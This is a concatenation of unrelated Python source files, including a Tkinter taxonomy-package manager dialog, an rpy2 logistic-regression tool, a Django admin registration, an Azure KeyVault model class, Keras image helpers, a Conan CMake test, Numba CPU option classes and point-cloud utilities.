self.packageDescrLabel = Label(packageInfoFrame, wraplength=600, justify="left") self.packageDescrLabel.grid(row=2, column=1, columnspan=5, sticky=W) self.packagePrefixesHdr = Label(packageInfoFrame, text=_("prefixes:"), state=DISABLED) self.packagePrefixesHdr.grid(row=3, column=0, sticky=W) self.packagePrefixesLabel = Label(packageInfoFrame, wraplength=600, justify="left") self.packagePrefixesLabel.grid(row=3, column=1, columnspan=5, sticky=W) ToolTip(self.packagePrefixesLabel, text=_("List of prefixes that this package remaps."), wraplength=240) self.packageUrlHdr = Label(packageInfoFrame, text=_("URL:"), state=DISABLED) self.packageUrlHdr.grid(row=4, column=0, sticky=W) self.packageUrlLabel = Label(packageInfoFrame, wraplength=600, justify="left") self.packageUrlLabel.grid(row=4, column=1, columnspan=5, sticky=W) ToolTip(self.packageUrlLabel, text=_("URL of taxonomy package (local file path or web loaded file)."), wraplength=240) self.packageDateHdr = Label(packageInfoFrame, text=_("date:"), state=DISABLED) self.packageDateHdr.grid(row=5, column=0, sticky=W) self.packageDateLabel = Label(packageInfoFrame, wraplength=600, justify="left") self.packageDateLabel.grid(row=5, column=1, columnspan=5, sticky=W) ToolTip(self.packageDateLabel, text=_("Date of currently loaded package file (with parenthetical node when an update is available)."), wraplength=240) self.packageEnableButton = Button(packageInfoFrame, text=self.ENABLE, state=DISABLED, command=self.packageEnable) ToolTip(self.packageEnableButton, text=_("Enable/disable package."), wraplength=240) self.packageEnableButton.grid(row=6, column=1, sticky=E) self.packageMoveUpButton = Button(packageInfoFrame, text=_("Move Up"), state=DISABLED, command=self.packageMoveUp) ToolTip(self.packageMoveUpButton, text=_("Move package up (above other remappings)."), wraplength=240) self.packageMoveUpButton.grid(row=6, column=2, sticky=E) self.packageMoveDownButton = Button(packageInfoFrame, text=_("Move Down"), state=DISABLED, command=self.packageMoveDown) ToolTip(self.packageMoveDownButton, text=_("Move package down (below other remappings)."), wraplength=240) self.packageMoveDownButton.grid(row=6, column=3, sticky=E) self.packageReloadButton = Button(packageInfoFrame, text=_("Reload"), state=DISABLED, command=self.packageReload) ToolTip(self.packageReloadButton, text=_("Reload/update package."), wraplength=240) self.packageReloadButton.grid(row=6, column=4, sticky=E) self.packageRemoveButton = Button(packageInfoFrame, text=_("Remove"), state=DISABLED, command=self.packageRemove) ToolTip(self.packageRemoveButton, text=_("Remove package from packages table (does not erase the package file)."), wraplength=240) self.packageRemoveButton.grid(row=6, column=5, sticky=E) packageInfoFrame.grid(row=2, column=0, columnspan=5, sticky=(N, S, E, W), padx=3, pady=3) packageInfoFrame.config(borderwidth=4, relief="groove") okButton = Button(frame, text=_("Close"), command=self.ok) ToolTip(okButton, text=_("Accept and changes (if any) and close dialog."), wraplength=240) cancelButton = Button(frame, text=_("Cancel"), command=self.close) ToolTip(cancelButton, text=_("Cancel changes (if any) and close dialog."), wraplength=240) okButton.grid(row=3, column=3, sticky=(S,E), pady=3) cancelButton.grid(row=3, column=4, sticky=(S,E), pady=3, padx=3) enableDisableFrame = Frame(frame) enableDisableFrame.grid(row=3, column=1, sticky=(S,W), pady=3) enableAllButton = Button(enableDisableFrame, text=_("Enable All"), command=self.enableAll) ToolTip(enableAllButton, text=_("Enable all packages."), wraplength=240) disableAllButton = Button(enableDisableFrame, text=_("Disable All"), command=self.disableAll) ToolTip(disableAllButton, text=_("Disable all packages."), wraplength=240) enableAllButton.grid(row=1, column=1) disableAllButton.grid(row=1, column=2) self.loadTreeViews() self.geometry("+{0}+{1}".format(dialogX+50,dialogY+100)) frame.grid(row=0, column=0, sticky=(N,S,E,W)) frame.columnconfigure(0, weight=0) frame.columnconfigure(1, weight=1) frame.rowconfigure(0, weight=1) window = self.winfo_toplevel() window.columnconfigure(0, weight=1) window.rowconfigure(0, weight=1) self.bind("<Return>", self.ok) self.bind("<Escape>", self.close) self.protocol("WM_DELETE_WINDOW", self.close) self.grab_set() self.wait_window(self) def loadTreeViews(self): self.selectedModule = None # clear previous treeview entries for previousNode in self.packagesView.get_children(""): self.packagesView.delete(previousNode) for i, packageInfo in enumerate(self.packagesConfig.get("packages", [])): name = packageInfo.get("name", "package{}".format(i)) node = self.packagesView.insert("", "end", "_{}".format(i), text=name) self.packagesView.set(node, "ver", packageInfo.get("version")) self.packagesView.set(node, "status", packageInfo.get("status")) self.packagesView.set(node, "date", packageInfo.get("fileDate")) if name in self.packageNamesWithNewerFileDates: self.packagesView.set(node, "update", _("available")) self.packagesView.set(node, "descr", packageInfo.get("description")) # clear previous treeview entries for previousNode in self.remappingsView.get_children(""): self.remappingsView.delete(previousNode) for i, remappingItem in enumerate(sorted(self.packagesConfig.get("remappings", {}).items())): prefix, remapping = remappingItem node = self.remappingsView.insert("", "end", prefix, text=prefix) self.remappingsView.set(node, "remapping", remapping) self.packageSelect() # clear out prior selection def ok(self, event=None): if self.packagesConfigChanged: PackageManager.packagesConfig = self.packagesConfig PackageManager.packagesConfigChanged = True self.cntlr.onPackageEnablementChanged() self.close() def close(self, event=None): self.parent.focus_set() self.destroy() def packageSelect(self, *args): node = (self.packagesView.selection() or (None,))[0] try: nodeIndex = int(node[1:]) except (ValueError, TypeError): nodeIndex = -1 if 0 <= nodeIndex < len(self.packagesConfig["packages"]): packageInfo = self.packagesConfig["packages"][nodeIndex] self.selectedPackageIndex = nodeIndex name = packageInfo["name"] self.packageNameLabel.config(text=name) self.packageVersionHdr.config(state=ACTIVE) self.packageVersionLabel.config(text=packageInfo["version"]) self.packageDescrHdr.config(state=ACTIVE) self.packageDescrLabel.config(text=packageInfo["description"]) self.packagePrefixesHdr.config(state=ACTIVE) self.packagePrefixesLabel.config(text=', '.join(packageInfo["remappings"].keys())) self.packageUrlHdr.config(state=ACTIVE) self.packageUrlLabel.config(text=packageInfo["URL"]) self.packageDateHdr.config(state=ACTIVE) self.packageDateLabel.config(text=packageInfo["fileDate"] + " " + (_("(an update is available)") if name in self.packageNamesWithNewerFileDates else "")) self.packageEnableButton.config(state=ACTIVE, text={"enabled":self.DISABLE, "disabled":self.ENABLE}[packageInfo["status"]]) self.packageMoveUpButton.config(state=ACTIVE if 0 < nodeIndex else DISABLED) self.packageMoveDownButton.config(state=ACTIVE if nodeIndex < (len(self.packagesConfig["packages"]) - 1) else DISABLED) self.packageReloadButton.config(state=ACTIVE) self.packageRemoveButton.config(state=ACTIVE) else: self.selectedPackageIndex = -1 self.packageNameLabel.config(text="") self.packageVersionHdr.config(state=DISABLED) self.packageVersionLabel.config(text="") self.packageDescrHdr.config(state=DISABLED) self.packageDescrLabel.config(text="") self.packagePrefixesHdr.config(state=DISABLED) self.packagePrefixesLabel.config(text="") self.packageUrlHdr.config(state=DISABLED) self.packageUrlLabel.config(text="") self.packageDateHdr.config(state=DISABLED) self.packageDateLabel.config(text="") self.packageEnableButton.config(state=DISABLED, text=self.ENABLE) self.packageMoveUpButton.config(state=DISABLED) self.packageMoveDownButton.config(state=DISABLED) self.packageReloadButton.config(state=DISABLED) self.packageRemoveButton.config(state=DISABLED) def findLocally(self): initialdir = self.cntlr.pluginDir # default plugin directory if not self.cntlr.isMac: # can't navigate within app easily, always start in default directory initialdir = self.cntlr.config.setdefault("packageOpenDir", initialdir) filename = self.cntlr.uiFileDialog("open", parent=self, title=_("Choose taxonomy package file"), initialdir=initialdir, filetypes=[(_("Taxonomy package files (*.zip)"), "*.zip"), (_("PWD Manifest (taxonomyPackage.xml)"), "taxonomyPackage.xml"), (_("pre-PWD Manifest (*.taxonomyPackage.xml)"), "*.taxonomyPackage.xml"), (_("pre-PWD Oasis Catalog (*catalog.xml)"), "*catalog.xml")], defaultextension=".zip") if filename: # check if a package is selected (any file in a directory containing an __init__.py self.cntlr.config["packageOpenDir"] = os.path.dirname(filename) packageInfo = PackageManager.packageInfo(self.cntlr, filename, packageManifestName=self.manifestNamePattern) self.loadFoundPackageInfo(packageInfo, filename) def findOnWeb(self): url = DialogURL.askURL(self) if url: # url is the in-cache or local file packageInfo = PackageManager.packageInfo(self.cntlr, url, packageManifestName=self.manifestNamePattern) self.cntlr.showStatus("") # clear web loading status self.loadFoundPackageInfo(packageInfo, url) def manifestName(self): self.manifestNamePattern = simpledialog.askstring(_("Archive manifest file name pattern"), _("Provide non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). \n" "Uses unix file name pattern matching. \n" "Multiple manifest files are supported in archive (such as oasis catalogs). \n" "(If blank, search for either .taxonomyPackage.xml or catalog.xml). "), initialvalue=self.manifestNamePattern, parent=self) def loadFoundPackageInfo(self, packageInfo, url): if packageInfo and packageInfo.get("name"): self.addPackageInfo(packageInfo) self.loadTreeViews() else: messagebox.showwarning(_("Package is not itself a taxonomy package. "), _("File does not itself contain a manifest file: \n\n{0}\n\n " "If opening an archive file, the manifest file search pattern currently is \"\", please press \"Manifest\" to change manifest file name pattern, e.g.,, \"*.taxonomyPackage.xml\", if needed. ") .format(url), parent=self) def removePackageInfo(self, name, version): # find package entry packagesList = self.packagesConfig["packages"] j = -1 for i, packageInfo in enumerate(packagesList): if packageInfo['name'] == name and packageInfo['version'] == version: j = i break if 0 <= j < len(packagesList): del self.packagesConfig["packages"][i] self.packagesConfigChanged = True def addPackageInfo(self, packageInfo): name = packageInfo["name"] version = packageInfo["version"] self.removePackageInfo(name, version) # remove any prior entry for this package self.packageNamesWithNewerFileDates.discard(name) # no longer has an update available self.packagesConfig["packages"].append(packageInfo) PackageManager.rebuildRemappings(self.cntlr) self.packagesConfigChanged = True def packageEnable(self): if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]): packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex] if self.packageEnableButton['text'] == self.ENABLE: packageInfo["status"] = "enabled" self.packageEnableButton['text'] = self.DISABLE elif self.packageEnableButton['text'] == self.DISABLE: packageInfo["status"] = "disabled" self.packageEnableButton['text'] = self.ENABLE self.packagesConfigChanged = True PackageManager.rebuildRemappings(self.cntlr) self.loadTreeViews() def packageMoveUp(self): if 1 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]): packages = self.packagesConfig["packages"] packageInfo = packages[self.selectedPackageIndex] del packages[self.selectedPackageIndex] packages.insert(self.selectedPackageIndex -1, packageInfo) self.packagesConfigChanged = True PackageManager.rebuildRemappings(self.cntlr) self.loadTreeViews() def packageMoveDown(self): if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]) - 1: packages = self.packagesConfig["packages"] packageInfo = packages[self.selectedPackageIndex] del packages[self.selectedPackageIndex] packages.insert(self.selectedPackageIndex + 1, packageInfo) self.packagesConfigChanged = True PackageManager.rebuildRemappings(self.cntlr) self.loadTreeViews() def packageReload(self): if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]): packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex] url = packageInfo.get("URL") if url: packageInfo = PackageManager.packageInfo(self.cntlr, url, reload=True, packageManifestName=packageInfo.get("manifestName")) if packageInfo: self.addPackageInfo(packageInfo) PackageManager.rebuildRemappings(self.cntlr) self.loadTreeViews() self.cntlr.showStatus(_("{0} reloaded").format(packageInfo.get("name")), clearAfter=5000) else: messagebox.showwarning(_("Package error"), _("File or package cannot be reloaded: \n\n{0}") .format(url), parent=self) def packageRemove(self): if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]): packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex] self.removePackageInfo(packageInfo["name"], packageInfo["version"]) self.packagesConfigChanged = True PackageManager.rebuildRemappings(self.cntlr) self.loadTreeViews() def enableAll(self): self.enableDisableAll(True) def disableAll(self): self.enableDisableAll(False) def enableDisableAll(self, doEnable): for iPkg in range(len(self.packagesConfig["packages"])): packageInfo = self.packagesConfig["packages"][iPkg] if doEnable: packageInfo["status"] = "enabled" self.packageEnableButton['text'] = self.DISABLE else: packageInfo["status"] = "disabled" self.packageEnableButton['text'] = self.ENABLE self.packagesConfigChanged = True PackageManager.rebuildRemappings(self.cntlr) self.loadTreeViews()
#!/usr/bin/env python # from galaxy import eggs import sys import rpy2.rinterface as ri import rpy2.rlike.container as rlc # from rpy import * import rpy2.robjects as robjects r = robjects.r def stop_err(msg): sys.stderr.write(msg) sys.exit() infile = sys.argv[1] y_col = int(sys.argv[2]) - 1 x_cols = sys.argv[3].split(",") outfile = sys.argv[4] print("Predictor columns: %s; Response column: %d" % (x_cols, y_col + 1)) fout = open(outfile, "w") elems = [] for i, line in enumerate(file(infile)): # noqa F821 line = line.rstrip("\r\n") if len(line) > 0 and not line.startswith("#"): elems = line.split("\t") break if i == 30: break # Hopefully we'll never get here... if len(elems) < 1: stop_err( "The data in your input dataset is either missing or not formatted properly." ) y_vals = [] x_vals = [] x_vector = [] for k, col in enumerate(x_cols): x_cols[k] = int(col) - 1 x_vals.append([]) NA = "NA" for ind, line in enumerate(file(infile)): # noqa F821 if line and not line.startswith("#"): try: fields = line.split("\t") try: yval = float(fields[y_col]) except Exception: yval = r("NA") y_vals.append(yval) for k, col in enumerate(x_cols): try: xval = float(fields[col]) except Exception: xval = r("NA") x_vals[k].append(xval) x_vector.append(xval) except Exception as e: print(e) # x_vals1 = numpy.asarray(x_vals).transpose() check1 = 0 check0 = 0 for i in y_vals: if i == 1: check1 = 1 if i == 0: check0 = 1 if check1 == 0 or check0 == 0: sys.exit("Warning: logistic regression must have at least two classes") for i in y_vals: if i not in [1, 0, r("NA")]: print(str(i), file=fout) sys.exit( "Warning: the current version of this tool can run only with two classes and need to be labeled as 0 and 1." ) # dat= r.list(x=array(x_vals1), y=y_vals) novif = 0 # set_default_mode(NO_CONVERSION) # try: # linear_model = r.glm(r("y ~ x"), data = r.na_exclude(dat),family="binomial") # #r('library(car)') # #r.assign('dat',dat) # #r.assign('ncols',len(x_cols)) # #r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family="binomial")')).as_py() # # except Exception as rex: # stop_err("Error performing logistic regression on the input data.\nEither the response column or one of the predictor columns contain only non-numeric or invalid values.") fv = robjects.FloatVector(x_vector) m = r["matrix"](fv, ncol=len(x_cols), byrow=True) # ensure order for generating formula od = rlc.OrdDict([("y", robjects.FloatVector(y_vals)), ("x", m)]) dat = robjects.DataFrame(od) # convert dat.names: ["y","x.1","x.2"] to formula string: 'y ~ x.1 + x.2' formula = " + ".join(dat.names).replace("+", "~", 1) print(formula) try: linear_model = r.glm(formula, data=r["na.exclude"](dat), family="binomial") except Exception: stop_err( "Error performing linear regression on the input data.\nEither the response column or one of the predictor columns contain only non-numeric or invalid values." ) if len(x_cols) > 1: try: r("library(car)") r.assign("dat", dat) r.assign("ncols", len(x_cols)) # vif=r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family="binomial")')) od2 = rlc.OrdDict([("datx", m)]) glm_data_frame = robjects.DataFrame(od2) glm_result = r.glm( "dat$y ~ .", data=r["na.exclude"](glm_data_frame), family="binomial" ) print("Have glm") vif = r.vif(glm_result) except Exception as rex: print(rex) else: novif = 1 # set_default_mode(BASIC_CONVERSION) # coeffs=linear_model.as_py()['coefficients'] coeffs = linear_model.rx2("coefficients") # null_deviance=linear_model.as_py()['null.deviance'] null_deviance = linear_model.rx2("null.deviance")[0] # residual_deviance=linear_model.as_py()['deviance'] residual_deviance = linear_model.rx2("deviance")[0] # yintercept= coeffs['(Intercept)'] yintercept = coeffs.rx2("(Intercept)")[0] summary = r.summary(linear_model) # co = summary.get('coefficients', 'NA') co = summary.rx2("coefficients") print(co) """ if len(co) != len(x_vals)+1: stop_err("Stopped performing logistic regression on the input data, since one of the predictor columns contains only non-numeric or invalid values.") """ try: yintercept = r.round(float(yintercept), digits=10)[0] # pvaly = r.round(float(co[0][3]), digits=10) pvaly = r.round(float(co.rx(1, 4)[0]), digits=10)[0] except Exception as e: print(str(e)) print("response column\tc%d" % (y_col + 1), file=fout) tempP = [] for i in x_cols: tempP.append("c" + str(i + 1)) tempP = ",".join(tempP) print("predictor column(s)\t%s" % (tempP), file=fout) print("Y-intercept\t%s" % (yintercept), file=fout) print("p-value (Y-intercept)\t%s" % (pvaly), file=fout) print(coeffs) if len(x_vals) == 1: # Simple linear regression case with 1 predictor variable try: # slope = r.round(float(coeffs['x']), digits=10) raw_slope = coeffs.rx2("x")[0] slope = r.round(float(raw_slope), digits=10)[0] except Exception: slope = "NA" try: # pval = r.round(float(co[1][3]), digits=10) pval = r.round(float(co.rx2(2, 4)[0]), digits=10)[0] except Exception: pval = "NA" print("Slope (c%d)\t%s" % (x_cols[0] + 1, slope), file=fout) print("p-value (c%d)\t%s" % (x_cols[0] + 1, pval), file=fout) else: # Multiple regression case with >1 predictors ind = 1 # while ind < len(coeffs.keys()): print(len(coeffs.names)) while ind < len(coeffs.names): try: # slope = r.round(float(coeffs['x'+str(ind)]), digits=10) raw_slope = coeffs.rx2("x." + str(ind))[0] slope = r.round(float(raw_slope), digits=10)[0] except Exception: slope = "NA" print("Slope (c%d)\t%s" % (x_cols[ind - 1] + 1, slope), file=fout) try: # pval = r.round(float(co[ind][3]), digits=10) pval = r.round(float(co.rx2(ind + 1, 4)[0]), digits=10)[0] except Exception: pval = "NA" print("p-value (c%d)\t%s" % (x_cols[ind - 1] + 1, pval), file=fout) ind += 1 # rsq = summary.get('r.squared','NA') rsq = summary.rx2("r.squared") if rsq == ri.RNULLType(): rsq = "NA" else: rsq = rsq[0] try: # rsq= r.round(float((null_deviance-residual_deviance)/null_deviance), digits=5) rsq = r.round(float((null_deviance - residual_deviance) / null_deviance), digits=5)[ 0 ] # null_deviance= r.round(float(null_deviance), digits=5) null_deviance = r.round(float(null_deviance), digits=5)[0] # residual_deviance= r.round(float(residual_deviance), digits=5) residual_deviance = r.round(float(residual_deviance), digits=5)[0] except Exception: pass print("Null deviance\t%s" % (null_deviance), file=fout) print("Residual deviance\t%s" % (residual_deviance), file=fout) print("pseudo R-squared\t%s" % (rsq), file=fout) print("\n", file=fout) print("vif", file=fout) if novif == 0: # py_vif=vif.as_py() count = 0 for i in sorted(vif.names): print("c" + str(x_cols[count] + 1), str(vif.rx2(i)[0]), file=fout) count += 1 elif novif == 1: print("vif can calculate only when model have more than 1 predictor", file=fout)
from django.contrib import admin from .models import Listing class ListingAdmin(admin.ModelAdmin): list_display = ('id', 'title', 'is_published', 'price', 'list_date', 'realtor') list_display_links = ('id', 'title') list_filter = ('realtor',) list_editable = ('is_published',) search_fields = ('title', 'description', 'address', 'city', 'zipcode', 'price') list_per_page = 25 admin.site.register(Listing, ListingAdmin)
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class StorageAccountItem(Model): """The storage account item containing storage account metadata. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Storage identifier. :vartype id: str :ivar resource_id: Storage account resource Id. :vartype resource_id: str :ivar attributes: The storage account management attributes. :vartype attributes: ~azure.keyvault.models.StorageAccountAttributes :ivar tags: Application specific metadata in the form of key-value pairs. :vartype tags: dict[str, str] """ _validation = { 'id': {'readonly': True}, 'resource_id': {'readonly': True}, 'attributes': {'readonly': True}, 'tags': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'resource_id': {'key': 'resourceId', 'type': 'str'}, 'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'}, 'tags': {'key': 'tags', 'type': '{str}'}, } def __init__(self, **kwargs): super(StorageAccountItem, self).__init__(**kwargs) self.id = None self.resource_id = None self.attributes = None self.tags = None
#!/usr/bin/python3 """ Copyright 2018-2019 Firmin.Sun ([email protected]) Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ # ----------------------------------------------------- # @Time : 11/8/2018 4:54 PM # @Author : Firmin.Sun ([email protected]) # @Software: ZJ_AI # ----------------------------------------------------- # -*- coding: utf-8 -*- import keras import numpy as np import cv2 from PIL import Image def read_image_bgr(path): ''' :param path: :return: (h, w, 3) ''' try: image = np.asarray(Image.open(path).convert('RGB')) except Exception as ex: print(path) return image[:, :, ::-1].copy() def preprocess_image(x): # mostly identical to "https://github.com/fchollet/keras/blob/master/keras/applications/imagenet_utils.py" # except for converting RGB -> BGR since we assume BGR already x = x.astype(keras.backend.floatx()) if keras.backend.image_data_format() == 'channels_first': if x.ndim == 3: x[0, :, :] -= 103.939 x[1, :, :] -= 116.779 x[2, :, :] -= 123.68 else: x[:, 0, :, :] -= 103.939 x[:, 1, :, :] -= 116.779 x[:, 2, :, :] -= 123.68 else: x[..., 0] -= 103.939 x[..., 1] -= 116.779 x[..., 2] -= 123.68 return x def resize_image(image, min_side=448, max_side=448): ''' resize image to dsize :param img: input (h, w, 3) = (rows, cols, 3) :param size: :return: out (h, w, 3) ''' (h, w, _) = image.shape scale = np.asarray((min_side, max_side),dtype=float) / np.asarray((h, w),dtype=float) # resize the image with the computed scale # cv2.resize(image, (w, h)) img = cv2.resize(image, (min_side, max_side)) return img, scale
import os import unittest import pytest from nose.plugins.attrib import attr from conans.test.assets.multi_config import multi_config_files from conans.test.utils.tools import TestClient @attr("slow") @pytest.mark.slow @pytest.mark.tool_cmake class CMakeConfigsTest(unittest.TestCase): def test_test_package_configs(self): client = TestClient() name = "Hello0" files = multi_config_files(name, test=True) client.save(files, clean_first=True) client.run("create . user/testing") self.assertIn("Hello Release Hello0", client.out) self.assertIn("Hello Debug Hello0", client.out) def test_cmake_multi(self): client = TestClient() deps = None for name in ["Hello0", "Hello1", "Hello2"]: files = multi_config_files(name, test=False, deps=deps) client.save(files, clean_first=True) deps = [name] if name != "Hello2": client.run("export . lasote/stable") client.run('install . --build missing') client.run("build .") cmd = os.sep.join([".", "bin", "say_hello"]) client.run_command(cmd) self.assertIn("Hello Release Hello2 Hello Release Hello1 Hello Release Hello0", " ".join(str(client.out).splitlines())) client.run_command(cmd + "_d") self.assertIn("Hello Debug Hello2 Hello Debug Hello1 Hello Debug Hello0", " ".join(str(client.out).splitlines()))
""" Defines CPU Options for use in the CPU target """ class FastMathOptions(object): """ Options for controlling fast math optimization. """ def __init__(self, value): # https://releases.llvm.org/7.0.0/docs/LangRef.html#fast-math-flags valid_flags = { 'fast', 'nnan', 'ninf', 'nsz', 'arcp', 'contract', 'afn', 'reassoc', } if isinstance(value, FastMathOptions): self.flags = value.flags.copy() elif value is True: self.flags = {'fast'} elif value is False: self.flags = set() elif isinstance(value, set): invalid = value - valid_flags if invalid: raise ValueError("Unrecognized fastmath flags: %s" % invalid) self.flags = value elif isinstance(value, dict): invalid = set(value.keys()) - valid_flags if invalid: raise ValueError("Unrecognized fastmath flags: %s" % invalid) self.flags = {v for v, enable in value.items() if enable} else: msg = "Expected fastmath option(s) to be either a bool, dict or set" raise ValueError(msg) def __bool__(self): return bool(self.flags) __nonzero__ = __bool__ def __repr__(self): return f"FastMathOptions({self.flags})" class ParallelOptions(object): """ Options for controlling auto parallelization. """ def __init__(self, value): if isinstance(value, bool): self.enabled = value self.comprehension = value self.reduction = value self.inplace_binop = value self.setitem = value self.numpy = value self.stencil = value self.fusion = value self.prange = value elif isinstance(value, dict): self.enabled = True self.comprehension = value.pop('comprehension', True) self.reduction = value.pop('reduction', True) self.inplace_binop = value.pop('inplace_binop', True) self.setitem = value.pop('setitem', True) self.numpy = value.pop('numpy', True) self.stencil = value.pop('stencil', True) self.fusion = value.pop('fusion', True) self.prange = value.pop('prange', True) if value: msg = "Unrecognized parallel options: %s" % value.keys() raise NameError(msg) elif isinstance(value, ParallelOptions): self.enabled = value.enabled self.comprehension = value.comprehension self.reduction = value.reduction self.inplace_binop = value.inplace_binop self.setitem = value.setitem self.numpy = value.numpy self.stencil = value.stencil self.fusion = value.fusion self.prange = value.prange else: msg = "Expect parallel option to be either a bool or a dict" raise ValueError(msg) class InlineOptions(object): """ Options for controlling inlining """ def __init__(self, value): ok = False if isinstance(value, str): if value in ('always', 'never'): ok = True else: ok = hasattr(value, '__call__') if ok: self._inline = value else: msg = ("kwarg 'inline' must be one of the strings 'always' or " "'never', or it can be a callable that returns True/False. " "Found value %s" % value) raise ValueError(msg) @property def is_never_inline(self): """ True if never inline """ return self._inline == 'never' @property def is_always_inline(self): """ True if always inline """ return self._inline == 'always' @property def has_cost_model(self): """ True if a cost model is provided """ return not (self.is_always_inline or self.is_never_inline) @property def value(self): """ The raw value """ return self._inline
import math import numpy as np import torch from scipy.spatial import cKDTree def setup_seed(seed): torch.backends.cudnn.deterministic = True torch.manual_seed(seed) torch.cuda.manual_seed_all(seed) np.random.seed(seed) def square_dists(points1, points2): ''' Calculate square dists between two group points :param points1: shape=(B, N, C) :param points2: shape=(B, M, C) :return: ''' B, N, C = points1.shape _, M, _ = points2.shape dists = torch.sum(torch.pow(points1, 2), dim=-1).view(B, N, 1) + \ torch.sum(torch.pow(points2, 2), dim=-1).view(B, 1, M) dists -= 2 * torch.matmul(points1, points2.permute(0, 2, 1)) #dists = torch.where(dists < 0, torch.ones_like(dists) * 1e-7, dists) # Very Important for dist = 0. return dists.float() def random_select_points(pc, m): if m < 0: idx = np.arange(pc.shape[0]) np.random.shuffle(idx) return pc[idx, :] n = pc.shape[0] replace = False if n >= m else True idx = np.random.choice(n, size=(m, ), replace=replace) return pc[idx, :] def generate_rotation_x_matrix(theta): mat = np.eye(3, dtype=np.float32) mat[1, 1] = math.cos(theta) mat[1, 2] = -math.sin(theta) mat[2, 1] = math.sin(theta) mat[2, 2] = math.cos(theta) return mat def generate_rotation_y_matrix(theta): mat = np.eye(3, dtype=np.float32) mat[0, 0] = math.cos(theta) mat[0, 2] = math.sin(theta) mat[2, 0] = -math.sin(theta) mat[2, 2] = math.cos(theta) return mat def generate_rotation_z_matrix(theta): mat = np.eye(3, dtype=np.float32) mat[0, 0] = math.cos(theta) mat[0, 1] = -math.sin(theta) mat[1, 0] = math.sin(theta) mat[1, 1] = math.cos(theta) return mat def generate_random_rotation_matrix(angle1=-45, angle2=45): thetax = np.random.uniform() * np.pi * angle2 / 180.0 thetay = np.random.uniform() * np.pi * angle2 / 180.0 thetaz = np.random.uniform() * np.pi * angle2 / 180.0 matx = generate_rotation_x_matrix(thetax) maty = generate_rotation_y_matrix(thetay) matz = generate_rotation_z_matrix(thetaz) return np.dot(matx, np.dot(maty, matz)) def generate_random_tranlation_vector(range1=-0.5, range2=0.5): tranlation_vector = np.random.uniform(range1, range2, size=(3, )).astype(np.float32) return tranlation_vector def transform(pc, R, t=None): pc = np.dot(pc, R.T) if t is not None: pc = pc + t return pc def batch_transform(batch_pc, batch_R, batch_t=None): ''' :param batch_pc: shape=(B, N, 3) :param batch_R: shape=(B, 3, 3) :param batch_t: shape=(B, 3) :return: shape(B, N, 3) ''' transformed_pc = torch.matmul(batch_pc, batch_R.permute(0, 2, 1).contiguous()) if batch_t is not None: transformed_pc = transformed_pc + torch.unsqueeze(batch_t, 1) return transformed_pc # The transformation between unit quaternion and rotation matrix is referenced to # https://zhuanlan.zhihu.com/p/45404840 def quat2mat(quat): w, x, y, z = quat R = np.zeros((3, 3), dtype=np.float32) R[0][0] = 1 - 2*y*y - 2*z*z R[0][1] = 2*x*y - 2*z*w R[0][2] = 2*x*z + 2*y*w R[1][0] = 2*x*y + 2*z*w R[1][1] = 1 - 2*x*x - 2*z*z R[1][2] = 2*y*z - 2*x*w R[2][0] = 2*x*z - 2*y*w R[2][1] = 2*y*z + 2*x*w R[2][2] = 1 - 2*x*x - 2*y*y return R def batch_quat2mat(batch_quat): ''' :param batch_quat: shape=(B, 4) :return: ''' w, x, y, z = batch_quat[:, 0], batch_quat[:, 1], batch_quat[:, 2], \ batch_quat[:, 3] device = batch_quat.device B = batch_quat.size()[0] R = torch.zeros(dtype=torch.float, size=(B, 3, 3)).to(device) R[:, 0, 0] = 1 - 2 * y * y - 2 * z * z R[:, 0, 1] = 2 * x * y - 2 * z * w R[:, 0, 2] = 2 * x * z + 2 * y * w R[:, 1, 0] = 2 * x * y + 2 * z * w R[:, 1, 1] = 1 - 2 * x * x - 2 * z * z R[:, 1, 2] = 2 * y * z - 2 * x * w R[:, 2, 0] = 2 * x * z - 2 * y * w R[:, 2, 1] = 2 * y * z + 2 * x * w R[:, 2, 2] = 1 - 2 * x * x - 2 * y * y return R def mat2quat(mat): w = math.sqrt(mat[0, 0] + mat[1, 1] + mat[2, 2] + 1 + 1e-8) / 2 x = (mat[2, 1] - mat[1, 2]) / (4 * w + 1e-8) y = (mat[0, 2] - mat[2, 0]) / (4 * w + 1e-8) z = (mat[1, 0] - mat[0, 1]) / (4 * w + 1e-8) return w, x, y, z def jitter_point_cloud(pc, sigma=0.01, clip=0.05): N, C = pc.shape assert(clip > 0) #jittered_data = np.clip(sigma * np.random.randn(N, C), -1*clip, clip).astype(np.float32) jittered_data = np.clip( np.random.normal(0.0, scale=sigma, size=(N, 3)), -1 * clip, clip).astype(np.float32) jittered_data += pc return jittered_data def shift_point_cloud(pc, shift_range=0.1): N, C = pc.shape shifts = np.random.uniform(-shift_range, shift_range, (1, C)).astype(np.float32) pc += shifts return pc def random_scale_point_cloud(pc, scale_low=0.8, scale_high=1.25): scale = np.random.uniform(scale_low, scale_high, 1) pc *= scale return pc def inv_R_t(R, t): inv_R = R.permute(0, 2, 1).contiguous() inv_t = - inv_R @ t[..., None] return inv_R, torch.squeeze(inv_t, -1) def uniform_2_sphere(num: int 